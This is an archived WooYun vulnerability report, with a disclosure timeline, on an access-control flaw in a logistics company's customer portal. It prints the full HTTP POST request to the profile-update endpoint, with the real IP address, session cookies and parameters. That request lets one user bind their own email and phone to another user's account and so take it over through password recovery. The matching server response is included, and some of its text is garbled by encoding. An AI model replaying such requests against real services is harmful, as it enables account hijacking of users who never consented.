乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-25: 细节已通知厂商并且等待厂商处理中 2015-04-29: 厂商已经确认,细节仅向厂商公开 2015-05-09: 细节向核心白帽子及相关领域专家公开 2015-05-19: 细节向普通白帽子公开 2015-05-29: 细节向实习白帽子公开 2015-06-13: 细节向公众公开
( ̄▽ ̄)
这个越权很奇葩,因为它越权不仅仅是修改任意用户的信息,而且还可以绑定任意用户邮箱,绑定任意用户手机号,并且能够长期控制帐号,邮箱和手机号都可以用于密码找回攻击者:Summer123321受害者:Summer321321我们先看下攻击者的帐号,熟悉一下这个越权的流程:
攻击者只需要将手机和邮箱越权绑定就达到了修改用户密码的目的,并且没有发现解绑的页面,攻击者会长期控制受害者的帐号下面来看看密码找回流程:
1.通过邮箱找回2.通过手机验证码这幅图已经是攻击者完成对受害者越权修改信息的图片,这里绑定了受害者的邮箱和手机,那么修改密码是很轻易可以完成的
手机号已经打码请求:
POST /user/updateuser.action HTTP/1.1Host: 180.153.24.4User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://180.153.24.4/user/touserinfo.actionContent-Length: 454Cookie: pageReferrInSession=; pgv_pvid=1300498580; Hm_lvt_39f474fa8fa9cefbed841228218c1418=1429885848,1429888013; CNZZDATA2456613=cnzz_eid%3D1615368528-1429885034-%26ntime%3D1429885034; __utma=14640183.1533181367.1429885848.1429885848.1429888014.2; __utmz=14640183.1429885848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=ZxON5liWX9aS5CkdsyEHfg__; BIGipServerpool_newweb_8080=1879288000.36895.0000; Hm_lpvt_39f474fa8fa9cefbed841228218c1418=1429889181; __utmb=14640183.42.10.1429888014; __utmc=14640183; lastLoginTime=2015%E5%B9%B404%E6%9C%8824%E6%97%A5++23%3A03%3A08; BIGipServerpool_newweb_80=3020073152.20480.0000; pageReferrInSession=http%3A//180.153.24.4/order/; depponLoginUserName=Summer321321; __utmt=1; __qc_wId=944Connection: keep-alivePragma: no-cacheCache-Control: no-cachepageUser.realName=Hacker&pageUser.telephone=********&pageUser.fixedPhone=010-21312121&pageUser.procity=%E5%B9%BF%E4%B8%9C%E7%9C%81-%E6%B7%B1%E5%9C%B3%E5%B8%82-%E7%A6%8F%E7%94%B0%E5%8C%BA&pageUser.province=&pageUser.city=%E5%B9%BF%E4%B8%9C%E7%9C%81-%E6%B7%B1%E5%9C%B3%E5%B8%82-%E7%A6%8F%E7%94%B0%E5%8C%BA&pageUser.address=11111&pageUser.userName=Summer321321&pageUser.gender=%E5%85%88%E7%94%9F&pageUser.userType=0&pageUser.remarkAddress=&valCode=873914
返回:
HTTP/1.1 200 OKServer: Apache-Coyote/1.1X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1Content-Type: application/json;charset=UTF-8Date: Fri, 24 Apr 2015 15:21:53 GMTContent-Length: 2319{"success":true,"isException":false,"cellPhone":null,"chooseWays":null,"codeMessage":null,"codeType":0,"consignors":null,"count":0,"currPage":1,"cusMsg":null,"custCode":null,"dataSize":0,"email":null,"exception":false,"flag":null,"ifElecBillBigCusts":0,"isComeIn":"no","isPrintUser":null,"isRefush":null,"list":null,"loginBefActionName":null,"loginJump":null,"logoutBefActionName":null,"message":"ok","modifyType":null,"nowTime":null,"pageCount":null,"pageSize":10,"pageUser":{"address":"11111","password":null,"userName":"Summer321321","roles":null,"status":0,"cusCode":null,"validateCode":null,"deptId":null,"city":"广ä¸ç-æ·±å³å¸-ç¦ç°åº","area":null,"province":"","telephone":"*********","fixedPhone":"010-21312121","remarkAddress":"","siteMessage":0,"email":null,"newPwd":null,"userType":2,"realName":"Hacker","refundPaymentOrder":0,"transportingOrder":0,"unuseCoupon":0,"gender":"å ç","lastLoginTime":null,"lastUpdateTime":null,"procity":"广ä¸ç-æ·±å³å¸-ç¦ç°åº","regiterTime":null,"bindTime":null,"status1":0,"hdNature":0,"roleids":null,"custSourceId":null,"id":null,"createUser":null,"createDate":null,"modifyDate":null,"modifyUser":null},"pagingConsignor":null,"pagingStr":null,"phoneMessageG":"success","phoneNumber":null,"phoneTime":null,"qqList":[],"quhao":null,"remeberName":null,"status":null,"successResultValue":null,"tatolCount":0,"thirdBinding":null,"user":{"address":"11111","password":"************","userName":"Summer123321","roles":null,"status":2,"cusCode":null,"validateCode":null,"deptId":null,"city":"广ä¸ç-æ·±å³å¸-ç¦ç°åº","area":null,"province":null,"telephone":null,"fixedPhone":"010-21312121","remarkAddress":null,"siteMessage":0,"email":"*********@126.com","newPwd":null,"userType":0,"realName":"11111111","refundPaymentOrder":0,"transportingOrder":0,"unuseCoupon":0,"gender":"å ç","lastLoginTime":1429888056000,"lastUpdateTime":1429888722000,"procity":"广ä¸ç-æ·±å³å¸-ç¦ç°åº","regiterTime":1429887621000,"bindTime":null,"status1":0,"hdNature":0,"roleids":null,"custSourceId":null,"id":"147A73E8EDE1CCC3E050A8C0480206A7","createUser":null,"createDate":null,"modifyDate":null,"modifyUser":null},"userId":null,"userName":null,"userType":0,"username":null,"valCode":"873914","validateCode":null,"wbList":[],"yourEmail":null}
危害等级:中
漏洞Rank:10
确认时间:2015-04-29 09:56
感谢您对德邦安全的关注以及对漏洞的反馈
暂无
